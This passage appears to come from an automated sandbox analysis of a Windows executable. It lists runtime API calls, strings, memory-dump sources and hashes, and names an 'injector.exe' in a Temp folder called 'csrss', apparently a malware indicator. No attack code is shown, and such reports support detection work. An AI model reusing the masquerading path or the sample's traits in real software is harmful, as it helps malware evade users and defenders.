                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1434
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1453
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1472
                                                              Strings
                                                              Similarity
                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                              • API String ID: 3255926029-3252031757
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name$false$true
                                                              • API String ID: 4121308752-1062449267
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name$false$true
                                                              • API String ID: 3230409043-1062449267
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: BlockUnwind$CatchExecutionFrameHandler3::Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 910750162-393685449
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 1386471777-1405518554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A35EB
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A35F9
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3623
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3669
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3675
                                                              Strings
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide
                                                              • String ID:
                                                              • API String ID: 2829165498-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                              • String ID:
                                                              • API String ID: 459529453-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                              • String ID:
                                                              • API String ID: 459529453-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 3523768491-393685449
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2967684691-1405518554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                              • String ID:
                                                              • API String ID: 1087005451-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: $*
                                                              • API String ID: 3215553584-3982473090
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2775327233-1405518554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2775327233-1405518554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __std_exception_copy.LIBVCRUNTIME ref: 00007FF6A00927B8
                                                                • Part of subcall function 00007FF6A009F4EC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F530
                                                                • Part of subcall function 00007FF6A009F4EC: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F576
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise__std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3973727643-1866435925
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 3215553584-3924258884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 1467352782-3733052814
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: e+000$gfff
                                                              • API String ID: 3215553584-3030954782
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 73155330-3924258884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2558813199-1018135373
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00AB2B6
                                                                • Part of subcall function 00007FF6A00AE5E4: HeapFree.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE5FA
                                                                • Part of subcall function 00007FF6A00AE5E4: GetLastError.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE60C
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A009D849), ref: 00007FF6A00AB2D4
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, xrefs: 00007FF6A00AB2C2
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                              • API String ID: 3580290477-1497792312
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 3215553584-3924258884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _handle_errorf
                                                              • String ID: "$powf
                                                              • API String ID: 2315412904-603753351
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _handle_error
                                                              • String ID: "$pow
                                                              • API String ID: 1757819995-713443511
                                                              • Opcode ID: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                              • Instruction ID: 1e9f61552fc206a44952c84fd80bab15d8f44dd0df9615e23175876e9272b89b
                                                              • Opcode Fuzzy Hash: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                              • Instruction Fuzzy Hash: 55315C72D1DA8697D760CF10E44076ABAA0FBDB345F201325F78986A59CFBDD0959F00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _set_errno_from_matherr
                                                              • String ID: exp
                                                              • API String ID: 1187470696-113136155
                                                              • Opcode ID: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                              • Instruction ID: 6bb44df71391e648fc4e4194cdc69cf61a7c807f74e00d67973dfbf7b4a76e3a
                                                              • Opcode Fuzzy Hash: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                              • Instruction Fuzzy Hash: FD210C76A1E746DBE760DF28E44066AB3A0FB99740F508135E68DC2B5AEF3CE4518F00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CompareStringtry_get_function
                                                              • String ID: CompareStringEx
                                                              • API String ID: 3328479835-2590796910
                                                              • Opcode ID: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                              • Instruction ID: 7d3800f0bff49edc8188d6d7a80d4d1b3d730e017752e8af2020083198d1a170
                                                              • Opcode Fuzzy Hash: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                              • Instruction Fuzzy Hash: 76113B36A08B8296D764CB55F4402AAB7A0FB89B84F548136EE8D83B5DCF3CD5608B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                              • String ID: bad locale name
                                                              • API String ID: 1838369231-1405518554
                                                              • Opcode ID: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                              • Instruction ID: 934391a4e54b531ef397a7bb501ebf27ed58103d751c0469e5c9d532be37ff3a
                                                              • Opcode Fuzzy Hash: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                              • Instruction Fuzzy Hash: 2E01622350BB819AD744DF79A88015D77A5FB68B88B185139DA8CC371EEF38C5A0C340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F530
                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F576
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                              • Instruction ID: f7a4e956ef504739ae72f6149675f9898f46201f6eca9835087c4a46cbc0bbb0
                                                              • Opcode Fuzzy Hash: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                              • Instruction Fuzzy Hash: 6B113A32619B4292EB208F25E840269B7A5FB88B94F194231DF8C87769DF3CD5718B00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: DefaultUsertry_get_function
                                                              • String ID: GetUserDefaultLocaleName
                                                              • API String ID: 3217810228-151340334
                                                              • Opcode ID: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                              • Instruction ID: 1b171032edbf9a59c814f4a2a162d6913fde147324255c7813401db82d1a9b93
                                                              • Opcode Fuzzy Hash: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                              • Instruction Fuzzy Hash: F0F08214F2A583A1FB189B65B5405F96261AF4A7C1F944039D90DC7BAEDE2CE8A5C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
